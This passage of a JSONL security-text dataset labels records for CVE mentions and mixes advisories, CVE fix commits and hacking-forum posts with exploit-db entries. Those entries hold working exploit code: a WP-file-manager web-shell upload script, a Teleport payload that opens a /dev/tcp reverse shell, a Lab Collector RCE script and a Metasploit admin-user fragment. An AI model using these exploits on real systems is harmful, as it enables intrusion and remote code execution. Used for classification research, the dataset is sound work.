\"userip\": null, \"username\": \"' + newuser + '\", \"userType\": \"Lokal Kullanıcı\"}'\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'ctype' => 'application/json',\n 'uri' => normalize_uri(target_uri.path, app_path, 'users'),\n 'headers' =>\n {\n 'Authorization' => token\n },\n 'data' => json_data\n })\n\n if res && res.code == 200 && res.body =~ /localhost/\n print_good(\"The sysAdmin authorized user has been successfully added.\")\n print_status(\"Username: #{newuser}\")\n print_status(\"Password: 1111111111\")\n else\n fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')\n end\n end\n\n def auth_bypass\n\n res = send_request_cgi({\n # default.a.default", "source": "exploitdb", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8cf41990f1bd5476b432", "text": "Path Traversal in Spring-integration-zip\n\n[Severity: MEDIUM]\n\nAddresses partial fix in CVE-2018-1263. Spring-integration-zip, versions prior to 1.0.4, exposes an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive (affects other archives as well, bzip2, tar, xz, war, cpio, 7z), that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder.", "source": "github_advisory", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a774ed10978bfeea9673", "text": "CVE: CVE-2022-31092\n\n[{'lang': 'en', 'value': \"Pimcore is an Open Source Data & Experience Management Platform. Pimcore offers developers listing classes to make querying data easier. This listing classes also allow to order or group the results based on one or more columns which should be quoted by default. The actual issue is that quoting is not done properly in both cases, so there's the theoretical possibility to inject custom SQL if the developer is using this methods with input data and not doing proper input validation in advance and so relies on the auto-quoting being done by the listing classes. This issue has been resolved in version 10.4.4. Users are advised to upgrade or to apple the patch manually. There are no known workarounds for this issue.\"}]\n\nFix commit: [Security] SQL Injection in Data Hub GraphQL (#12444)\n\n* [Security] SQL Injection in Data Hub GraphQL (AbstractListing)\r\n\r\n* Update lib/Model/Listing/AbstractListing.php\r\n\r\nCo-authored-by: Jacob Dreesen \r\n\r\n* Update lib/Model/Listing/AbstractListing.php\r\n\r\nCo-authored-by: mcop1 <89011527+mcop1@users.noreply.github.com>\r\n\r\nCo-authored-by: Jacob Dreesen \r\nCo-authored-by: Bernhard Rusch ", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "430d2a8cb8c8f18b928a", "text": "CVE: CVE-2022-23651\n\n[{'lang': 'en', 'value': 'b2-sdk-python is a python library to access cloud storage provided by backblaze. Linux and Mac releases of the SDK version 1.14.0 and below contain a key disclosure vulnerability that, in certain conditions, can be exploited by local attackers through a time-of-check-time-of-use (TOCTOU) race condition. SDK users of the SqliteAccountInfo format are vulnerable while users of the InMemoryAccountInfo format are safe. The SqliteAccountInfo saves API keys (and bucket name-to-id mapping) in a local database file ($XDG_CONFIG_HOME/b2/account_info, ~/.b2_account_info or a user-defined path). When first created, the file is world readable and is (typically a few milliseconds) later altered to be private to the user. If the directory containing the file is readable by a local attacker then during the brief period between file creation and permission modification, a local attacker can race to open the file and maintain a handle to it. This allows the local attacker to read the contents after the file after the sensitive information has been saved to it. Consumers of this SDK who rely on it to save data using SqliteAccountInfo class should upgrade to the latest version of the SDK. Those who believe a local user might have opened a handle using this race condition, should remove the affected database files and regenerate all application keys. Users should upgrade to b2-sdk-python 1.14.1 or later.'}]\n\nFix commit: Merge pull request from GHSA-p867-fxfr-ph2w\n\n* Fix setting permissions for local sqlite database\n\nThanks to Jan Schejbal for responsible disclosure!\n\nThere used to be a brief moment between creation of the sqlite\ndatabase and applying chmod, now there is no such delay.\n\n* Rename self.home to self.test_home in tests\n\n* Actually call the test cleanup\n\n* Add a test for sqlite permissions\n\n* Skip the sqlite chmod test on Windows", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "49d24b5c28bf8e4e3cd4", "text": "Just solved this. To anyone stuck at this place. The only hint I think I would give in public is to notice that your reverse shell isn’t fully interactive. It is possible and necessary to have a fully interactive tty shell.", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a22423ef7077f0f6b87c", "text": "does anybody know what the ^ does? i can’t find the answer online.", "source": "hackthebox", "timestamp": "2023-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bb04343996b992744d18", "text": "katello SQL Injection vulnerability\n\n[Severity: MEDIUM]\n\nA SQL injection flaw was found in katello's errata-related API. An authenticated remote attacker can craft input data to force a malformed SQL query to the backend database, which will leak internal IDs. This is issue is related to an incomplete fix for CVE-2016-3072. Version 3.10 and older is vulnerable.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0a8af71a3585bafe1301", "text": "If you just want to reset fault codes, buy an OBD2 reader, they are about £6 - ($10) and connect to a mobile phone, either by WiFi (shows as a network to connect too), or via bluetooth to read codes and reset them. As for car hacking, they are embedded sytems, so all data is held in eeprom chips, this makes reading and writing data a fairly slow process.", "source": "parrotsec", "timestamp": "2023-04-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2292a7155145173bdf3d", "text": "CVE: CVE-2022-1238\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in libr/bin/format/ne/ne.c in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is heap overflow and may be exploitable. For more general description of heap buffer overflow, see [CWE](https://cwe.mitre.org/data/definitions/122.html).'}]\n\nFix commit: Fix another oobread segfault in the NE bin parser ##crash\n\n* Reported by @han0nly via huntr.dev\n* Reproducers: sample1 sample2 sample3\n* BountyID: 47422cdf-aad2-4405-a6a1-6f63a3a93200", "source": "cvefixes", "timestamp": "2022-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c44d8ba19d13a19d7586", "text": "Ok so I’ve been banging my head against a wall here. Every operand except && seems to be blocked. A sub shell is possible, so I started fiddling with sending bash commands encoded in base64. I tried an ls payload at first, and got index.php and config.php as the only extra files visible. Now for the weird part, when I send a payload like this, it breaks the website. I can’t send a new payload and if I go back to the website IP I get this: Screenshot from 2022-11-06 12-15-31 560×227 19.7 KB The payload looks like this: I can read the config file and any attempt to move any of the files after this results in a Malicious error. To try another payload I have to restart the server. I’ve tried a payload to cat flag.txt as well but it responds with ‘flag.txt:no such file or directory’. The server breaks and needs to be restarted after that. The flag payload contains ‘cat flag.txt’ encoded in base64: Any help would be greatly appreciated!", "source": "hackthebox", "timestamp": "2022-11-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "57842e25fc86e5344e70", "text": "Evil twin portal specific variant\n\nHi guys! I don’t want to create classical evil twin portal. Pen tested it, works, al least airgeddon one and fluxion are decent. I want to create completely the same working portal as evil twin, except I want to give it a custom name. So it works the same, but the name of the AP - essid is as I see fit. That scripts don’t offer that option. I could rewrite them, but that would be hassle. Is someone willing to give me an advice how could I do it fast, with not too much hassle? Or at least in which direction should I look, to learn it myself? I tried with mdk3 and created a fake AP. Works nicely, except it would be better if it would capture all wifi password login attempts. I can do mdk4, mdk3 or classic deauth separately. I use Kali and Parrot Os for pen testing and Alpha NHA. Thank you!", "source": "hackersploit", "timestamp": "2022-05-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1cfc76e5531e37ceb5f5", "text": "Thank you for the comment. I completely agree with these points. But in reality, we can't keep this list too short. I have researched many blogs, and white papers, and analysed many high-performing websites to arrive at my final list. Here is mine. SEO Speed (Short loading time) UI & UX Relevancy (Information) Easy navigation I have seen many pages violate these factors to attract traffic, but in reality, they are jeopardising their online reputation. When service companies prepare their service pages or even publish the blog, these key factors play a crucial role in ranking organically. When preparing pages for ai service, custom software development, mobile app development etc visitors always look for a bundle of information in swift time. That is why it is important to pay attention to the on-page content and other performance factors.", "source": "go4expert", "timestamp": "2022-07-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "984a4a1a5cc0c85cb386", "text": "Hello! I got hung up on the task “Bruteforcing Passwords”. It seems nothing complicated, one question: “Using rockyou-50.txt as password wordlist and tb user as the username, find the policy and filter out strings that don’t respect it. What is the valid password for the htb user account?” I created my own table, defined a password policy. Filtered out everything unnecessary. Even the list turned out to be small. But persistently the password, which should be correct, does not fit in any way. Strangely simple, how did you solve this problem?", "source": "hackthebox", "timestamp": "2022-07-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "094230e3769512f77f66", "text": "Network adapter for a beginner\n\nHi, I’m a student and I’m just entering the huge world of cybersecurity. At the moment I have a Lenovo Ideapad laptop, and it works decently. Looking at different penetration testing tutorials I see that many recommend to buy a network adapter, so you can have the possibility to use the network card in monitor mode or do packet injection. The laptop’s network adapter can get into monitor mode (unfortunately I have to reboot the computer to get it back into managed mode), but I haven’t tried if it supports packet injection yet. Would you advise me to buy a network adapter, obviously not a very powerful one (at least for now), although it can already do several things? Thanks in advance", "source": "hackersploit", "timestamp": "2022-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8a53f682c45a99686927", "text": "CVE: CVE-2021-3656\n\n[{'lang': 'en', 'value': 'A flaw was found in the KVM\\'s AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the \"virt_ext\" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape.'}]\n\nFix commit: KVM: nSVM: always intercept VMLOAD/VMSAVE when nested (CVE-2021-3656)\n\nIf L1 disables VMLOAD/VMSAVE intercepts, and doesn't enable\nVirtual VMLOAD/VMSAVE (currently not supported for the nested hypervisor),\nthen VMLOAD/VMSAVE must operate on the L1 physical memory, which is only\npossible by making L0 intercept these instructions.\n\nFailure to do so allowed the nested guest to run VMLOAD/VMSAVE unintercepted,\nand thus read/write portions of the host physical memory.\n\nFixes: 89c8a4984fc9 (\"KVM: SVM: Enable Virtual VMLOAD VMSAVE feature\")\n\nSuggested-by: Paolo Bonzini \nSigned-off-by: Maxim Levitsky \nSigned-off-by: Paolo Bonzini ", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8669289dc0e6d21219e6", "text": "CVE: CVE-2022-31072\n\n[{'lang': 'en', 'value': 'Octokit is a Ruby toolkit for the GitHub API. Versions 4.23.0 and 4.24.0 of the octokit gem were published containing world-writeable files. Specifically, the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--` (i.e. 0644). This means everyone who is not the owner (Group and Public) with access to the instance where this release had been installed could modify the world-writable files from this gem. This issue is patched in Octokit 4.25.0. Two workarounds are available. Users can use the previous version of the gem, v4.22.0. Alternatively, users can modify the file permissions manually until they are able to upgrade to the latest version.'}]\n\nFix commit: Merge pull request #1446 from octokit/updates-release-steps-ic\n\nAdds details on how to run a manual file integrity check", "source": "cvefixes", "timestamp": "2022-06-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a1c9e00fd1a07947d4fb", "text": "CVE: CVE-2022-2182\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5150: read past the end of the first line with \":0;'{\"\n\nProblem: Read past the end of the first line with \":0;'{\".\nSolution: When on line zero check the column is valid for line one.", "source": "cvefixes", "timestamp": "2022-06-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "875fd81b5663c7a80eb9", "text": "CVE: CVE-2021-4043\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0.'}]\n\nFix commit: fixed #2092", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "41e1aca145ff849b2b11", "text": "CVE: CVE-2020-27787\n\n[{'lang': 'en', 'value': 'A Segmentaation fault was found in UPX in invert_pt_dynamic() function in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service.'}]\n\nFix commit: Detect 0==DT_SYMTAB in invert_pt_dynamic()\n\nhttps://github.com/upx/upx/issues/333\n\tmodified: p_lx_elf.cpp", "source": "cvefixes", "timestamp": "2022-08-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "506574a70a697f7915cb", "text": "I installed the TheRatFat but I heven’t any generated file in output. Why? Doesn’t work?", "source": "parrotsec", "timestamp": "2022-03-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ce75d9f102fb65241b04", "text": "Hi @Darryl It looks like this page has an answer: everything.curl.dev SSLKEYLOGFILE", "source": "parrotsec", "timestamp": "2023-05-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "956ec5b17a0036fa2eb6", "text": "Keep in mind that if you are using two or more switches together, you only need one “-”. You have -X -r and have two “-” so that’s incorrect. You have -r (Filename) and then -X. That’s incorrect. Then you have -rX. Now look at that one one for a second. In -rX you are telling tcpdump to read first THEN after reading do X. But the command wont work because you interruped the read command with X. Getting the ideas here. Try flipping -rX and same file name. Also the question asked for the command, not the swithces. So it would be sudo tcpdump [your switches] [file name]. sudp tcpdump-** /file name 1/file pcap", "source": "hackthebox", "timestamp": "2022-05-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4b2b6849ba9512f5824e", "text": "CVE: CVE-2022-24840\n\n[{'lang': 'en', 'value': 'django-s3file is a lightweight file upload input for Django and Amazon S3 . In versions prior to 5.5.1 it was possible to traverse the entire AWS S3 bucket and in most cases to access or delete files. If the `AWS_LOCATION` setting was set, traversal was limited to that location only. The issue was discovered by the maintainer. There were no reports of the vulnerability being known to or exploited by a third party, prior to the release of the patch. The vulnerability has been fixed in version 5.5.1 and above. There is no feasible workaround. We must urge all users to immediately updated to a patched version.'}]\n\nFix commit: Fix CVE-XXXX-XXXX -- Fix Path Traversal security vulnerability", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3946be1a00ce6a23a7d7", "text": "Can you show the syntax that you usted to get the flag? To know what and why you’re stuck. If you’re doing something wrong. For the last, do you upload the right payload in the “404.php” on theme editor? Feel free to DM me.", "source": "hackthebox", "timestamp": "2022-01-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d87cf416ef610a06c10a", "text": "There is a free tool online called Email-Extractor Email Extractor - Online tool for extracting any email address (email-checker.net) That can extract email addresses from the text content. I hope you found this helpful", "source": "hackersploit", "timestamp": "2022-03-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "348573433f21a81ff569", "text": "WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE\n\n#!/usr/bin/env\n\n# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE\n# Date: [ 22-01-2023 ]\n# Exploit Author: [BLY]\n# Vendor Homepage: [https://wpscan.com/vulnerability/10389]\n# Version: [ File Manager plugin 6.0-6.9]\n# Tested on: [ Debian ]\n# CVE : [ CVE-2020-25213 ]\n\nimport sys,signal,time,requests\nfrom bs4 import BeautifulSoup\n#from pprint import pprint\n\ndef handler(sig,frame):\n\tprint (\"[!]Saliendo\")\n\tsys.exit(1)\n\nsignal.signal(signal.SIGINT,handler)\n\ndef commandexec(command):\n\n\texec_url = url+\"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php\"\n\tparams = {\n\t\t\"cmd\":command\n\t}\n\n\tr=requests.get(exec_url,params=params)\n\n\tsoup = BeautifulSoup(r.text, 'html.parser')\n\ttext = soup.get_text()\n\n\tprint (text)\ndef exploit():\n\n\tglobal url\n\n\turl = sys.argv[1]\n\tcommand = sys.argv[2]\n\tupload_url = url+\"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n\n\theaders = {\n\t\t\t'content-type': \"multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww\",\n\t\t\t'Connection': \"close\"\n\t}\n\n\tpayload = \"------WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\\"cmd\\\"\\r\\n\\r\\nupload\\r\\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\\"target\\\"\\r\\n\\r\\nl1_Lw\\r\\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\\"upload[]\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\\" . shell_exec($_REQUEST['cmd']) . \\\"\\\"; ?>\\r\\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--\"\n\n\ttry:\n\t\tr=requests.post(upload_url,data=payload,headers=headers)\n\t\t#pprint(r.json())\n\t\tcommandexec(command)\n\texcept:\n\t\tprint(\"[!] Algo ha salido mal...\")\n\n\n\n\ndef help():\n\n\tprint (\"\\n[*] Uso: python3\",sys.argv[0],\"\\\"url\\\" \\\"comando\\\"\")\n\tprint (\"[!] Ejemplo: python3\",sys.argv[0],\"http://wordpress.local/ id\")\n\n\n\n\nif __name__ == '__main__':\n\n\tif len(sys.argv) != 3:\n\t\thelp()\n\n\telse:\n\t\texploit()", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e143e7f5b3dab19382e6", "text": "Unauthenticated users can exploit an enumeration vulnerability in Harbor (CVE-2019-19030)\n\n[Severity: MEDIUM]\n\n# Impact\nSean Wright from Secureworks has discovered an enumeration vulnerability. An attacker can make use of the Harbor API to make unauthenticated calls to the Harbor instance. Based on the HTTP status code in the response, an attacker is then able to work out which resources exist, and which do not. This would likely be accomplished by either providing a wordlist or enumerating through a sequence an\nunauthenticated attacker is able to enumerate resources on the system. This provides them with information such as existing projects, repositories, etc.\n\nThe vulnerability was immediately fixed by the Harbor team. \n\n# Issue \nThe following API resources where found to be vulnerable to enumeration attacks:\n/api/chartrepo/{repo}/prov (POST)\n/api/chartrepo/{repo}/charts (GET, POST)\n/api/chartrepo/{repo}/charts/{name} (GET, DELETE)\n/api/chartrepo/{repo}/charts/{name}/{version} (GET, DELETE)\n/api/labels?name={name}&scope=p (GET)\n/api/repositories?project_id={id} (GET)\n/api/repositories/{repo_name}/ (GET, PUT, DELETE)\n/api/repositories/{repo_name}/tags (GET)\n/api/repositories/{repo_name}/tags/{tag}/manifest?version={version} (GET)\n/api/repositories/{repo_name/{tag}/labels (GET)\n/api/projects?project_name={name} (HEAD)\n/api/projects/{project_id}/summary (GET)\n/api/projects/{project_id}/logs (GET)\n/api/projects/{project_id} (GET, PUT, DELETE)\n/api/projects/{project_id}/metadatas (GET, POST)\n/api/projects/{project_id}/metadatas/{metadata_name} (GET, PUT)\n\n# Known Attack Vectors\nSuccessful exploitation of this issue will lead to bad actors identifying which resources exist in Harbor without requiring authentication for the Harbor API.\n\n# Patches\nIf your product uses the affected releases of Harbor, update to version 1.10.3 or 2.0.1 to patch this issue immediately.\n\nhttps://github.com/goharbor/harbor/releases/tag/v1.10.3\nhttps://github.com/goharbor/harbor/releases/tag/v2.0.1\n\n# Workarounds\nThere is no known workaround\n\n# For more information\nIf you have any questions or comments about this advisory, contact cncf-harbor-security@lists.cncf.io\nView our security policy at https://github.com/goharbor/harbor/security/policy", "source": "github_advisory", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "742136419922c82c5333", "text": "Ctf command\n\nHi there, I’m trying to find some people, who can help me with experience in real CTF. I’m not new in CTF, but I want to see how cool people solve challenges in real CTF, maybe even play CTF with them.))))))", "source": "hackthebox", "timestamp": "2023-07-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "015ff31cdc16b45a1703", "text": "MCL-Net 4.3.5.8788 - Information Disclosure\n\n# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure\n# Date: 5/31/2023\n# Exploit Author: Victor A. Morales, GM Sectec Inc.\n# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php\n# Version: 4.3.5.8788 (other versions may be affected)\n# Tested on: Microsoft Windows 10 Pro\n# CVE: CVE-2023-34834\n\nDescription:\nDirectory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the \"/file\" endpoint.\n\nSteps to reproduce:\n1. Navigate to the webserver on default port 5080, where \"Index of Services\" will disclose directories, including the \"/file\" directory.\n2. Browse to the \"/file\" directory and database entry folders configured\n3. The \"AdoInfo.txt\" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.", "source": "exploitdb", "timestamp": "2023-06-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2f046755e0931610ea1b", "text": "This is not that kind of forum. If you want these kind of activities performed you best turn your browser elsewhere.", "source": "hackersploit", "timestamp": "2022-06-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bb986001c6775f5f5409", "text": "CVE: CVE-2022-33172\n\n[{'lang': 'en', 'value': \"de.fac2 1.34 allows bypassing the User Presence protection mechanism when there is malware on the victim's PC.\"}]\n\nFix commit: Update README.md", "source": "cvefixes", "timestamp": "2022-08-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e1e4d30b411b81de51cd", "text": "wifite returning mac addressed that i can not look up\n\nI am trying to learn hacking to move up in our company. I downloaded parrot 5 and bought an alfa with the 8812 chipset. I ran wifite (i set some networks in my house to practice on) but I am also getting 6 mac addresses in the list 76:AC:B9:BE:F8:92 76:AC:B9:39:60:CD 1E:30:08:35:66:A3 9A:8A:20:54:43:5A C6:98:5C:98:DD:D0 8E:49:62:44:89:31 I can find no information on these. Does anyone have any idea what they are are or why I am getting them", "source": "parrotsec", "timestamp": "2022-04-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "18e1fc6ca956cfef95c7", "text": "You are on the right track with the User agent. Play around with your inputs. Maybe make them simple at first just to make sure you can actually run code. There is a risk that you can enter in a user agent which breaks the admin page when it tries to read the access log, this means that any agent text entered after the one that broke the page will have no effect because the page breaks before it can read any new agents. You will need to restart the assessment machine if that happens.", "source": "hackthebox", "timestamp": "2022-11-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1d15a71c81cd81984b5a", "text": "Teleport v10.1.1 - Remote Code Execution (RCE)\n\n# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)\n# Date: 08/01/2022\n# Exploit Author: Brandon Roach & Brian Landrum\n# Vendor Homepage: https://goteleport.com\n# Software Link: https://github.com/gravitational/teleport\n# Version: < 10.1.2\n# Tested on: Linux\n# CVE: CVE-2022-36633\n\nProof of Concept (payload):\nhttps://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=\nf%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=\n0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=\nmethod=3Diam\n\n\nDecoded payload:\n\"\n/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #", "source": "exploitdb", "timestamp": "2022-09-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7f35eedecf469e9175c0", "text": "Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE)\n\n# Exploit Title: Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE)\n# Date: 2023-02-28\n# Exploit Author: Anthony Cole\n# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/\n# Version: v4.234\n# Contact: http://twitter.com/acole76\n# Website: http://twitter.com/acole76\n# Tested on: PHP/MYSQL\n# CVE: CVE-2023-24217\n# Category: webapps\n#\n# Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.\n#\n\nfrom argparse import ArgumentParser\nfrom requests import Session\nfrom random import choice\nfrom string import ascii_lowercase, ascii_uppercase, digits\nimport re\nfrom base64 import b64encode\nfrom urllib.parse import quote_plus\n\nsess:Session = Session()\ncookies = {}\nheaders = {}\nstate = {}\n\ndef random_string(length:int) -> str:\n return \"\".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))\n\ndef login(base_url:str, username:str, password:str) -> bool:\n data = {\"login\": username, \"pass\": password, \"Submit\":\"\", \"action\":\"login\"}\n headers[\"Referer\"] = f\"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile\"\n res = sess.post(f\"{base_url}/login.php\", data=data, headers=headers)\n\n if(\"My profile\" in res.text):\n return res.text\n else:\n return None\n\ndef logout(base_url:str) -> bool:\n headers[\"Referer\"] = f\"{base_url}//index.php?controller=user_profile&subcontroller=update\"\n sess.get(f\"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate\",headers=headers)\n\ndef extract_field_value(contents, name):\n value = re.findall(f'name=\"{name}\" value=\"(.*)\"', contents)\n if(len(value)):\n return value[0]\n else:\n return \"\"\n\ndef get_profile(html:str):\n return {\n \"contact_name\": extract_field_value(html, \"contact_name\"),\n \"contact_lab\": extract_field_value(html, \"contact_lab\"),\n \"contact_address\": extract_field_value(html, \"contact_address\"),\n \"contact_city\": extract_field_value(html, \"contact_city\"),\n \"contact_zip\": extract_field_value(html, \"contact_zip\"),\n \"contact_country\": extract_field_value(html, \"contact_country\"),\n \"contact_tel\": extract_field_value(html, \"contact_tel\"),\n \"contact_email\": extract_field_value(html, \"contact_email\")\n }\n\n\ndef update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:\n headers[\"Referer\"] = f\"{base_url}/index.php?controller=user_profile&subcontroller=update\"\n res = sess.post(f\"{base_url}/index.php?controller=user_profile&subcontroller=update\", data=data, headers=headers)\n return True\n\ndef execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):\n session_file = sess.cookies.get(\"PHPSESSID\")\n headers[\"Referer\"] = f\"{base_url}/login.php?%2F\"\n page = f\"../../../../../..{session_path}/sess_{session_file}\"\n res = sess.get(f\"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}\", headers=headers)\n return parse_output(res.text, wrapper)\n\ndef exploit(args) -> None:\n wrapper = random_string(5)\n param = random_string(3)\n html = login(args.url, args.login_username, args.login_password)\n\n if(html == None):\n print(\"unable to login\")\n return False\n\n clean = get_profile(html)\n data = get_profile(html)\n tag = b64encode(wrapper.encode()).decode()\n payload = f\"\"\n\n data[\"contact_name\"] = payload #inject payload in name field\n\n if(update_profile(args.url, wrapper, param, data)):\n login(args.url, args.login_username, args.login_password) # reload the session w/ our payload\n print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))\n update_profile(args.url, wrapper, param, clean) # revert the profile\n\n logout(args.url)\n\n\ndef parse_output(con", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b93e7b53e0f18d184213", "text": "To the question: Create an “If-Else” condition in the “For”-Loop of the “Exercise Script” that prints you the number of characters of the 35th generated value of the variable “var”. Submit the number as the answer. The amount you need to go up to might vary. Some had 28 , I had 35 , when you read this yours may be different Psudo code which worked for me: for counter in {1 up to the amount you need to count} do print the counter for Diagnostics var=$(echo $var | base64) if the counter is equal to \"the amount you need to count up to\" then echo $var | wc -c fi done echo $var | wc -c will print a 4/5/6/n digit number which is your answer. I was trying answers like “5” because it was a 5-digit number which was produced. That was wrong. NOTE: Run this on the PWN box, not your local machine because the hashing engine may be different to the one which generates in the answer Good luck !", "source": "hackthebox", "timestamp": "2023-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b30fb4e8bfc900c92822", "text": "Thank you! plus: we are in the machine already, so an exec is enough tho", "source": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cd3db1f74bd46226131c", "text": "runc AppArmor bypass with symlinked /proc\n\n[Severity: MEDIUM]\n\n### Impact\nIt was found that AppArmor, and potentially SELinux, can be bypassed when `/proc` inside the container is symlinked with a specific mount configuration.\n\n### Patches\nFixed in runc v1.1.5, by prohibiting symlinked `/proc`: https://github.com/opencontainers/runc/pull/3785\n\nThis PR fixes CVE-2023-27561 as well.\n\n### Workarounds\nAvoid using an untrusted container image.\n\n", "source": "github_advisory", "timestamp": "2023-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "490a56fb0a9ee9d3b58d", "text": "you need to spawn the target system then ssh into the ip address which spawned", "source": "hackthebox", "timestamp": "2023-06-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2145513ed952d0b1f0e0", "text": "about enumeration\n\nwhen i try this code nmap scan 738×52 21.7 KB i get this benim 825×247 45.1 KB but in enumeration video hackersploit gets this whats the problem nmap1 1217×746 80.5 KB", "source": "hackersploit", "timestamp": "2022-10-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8b1e1dc51af5ab46c707", "text": "CVE: CVE-2022-21699\n\n[{'lang': 'en', 'value': 'IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross 